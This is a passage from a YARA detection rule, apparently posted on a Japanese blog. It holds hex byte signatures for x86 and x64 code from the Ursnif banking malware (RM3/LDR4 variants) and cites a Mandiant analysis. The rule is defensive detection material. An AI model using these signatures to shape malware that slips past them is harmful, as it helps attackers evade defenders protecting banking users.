        $x64_code5 = { 48 8D 8C 24 [4] BA 30 00 FE 7F 41 B8 08 00 00 00 E8 }

 

        $x86_code1 = { 81 F9 2E 62 73 73 74 09 83 C6 28 }

        $x86_code2 = { 8B 06 8B D0 23 55 0C 8B D8 0B 5D 0C F7 D2 23 D3 2B D1 8A 4D 08 80 E1 07 83 C6 04 89 17 83 C7 04 FE C1 D3 C0 83 6D 08 04 8B C8 79 }

        $x86_code3 = { 8A 0E 0F B6 D1 8B CA 83 E1 03 C1 E1 03 D3 E2 46 03 C2 4F 75 }

        $x86_code4 = { 6A 08 8D 45 F8 68 30 00 FE 7F 50 E8 }

 

    condition:

        5 of them

 

}

参照: https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud

Comments

タイトルとURLをコピーしました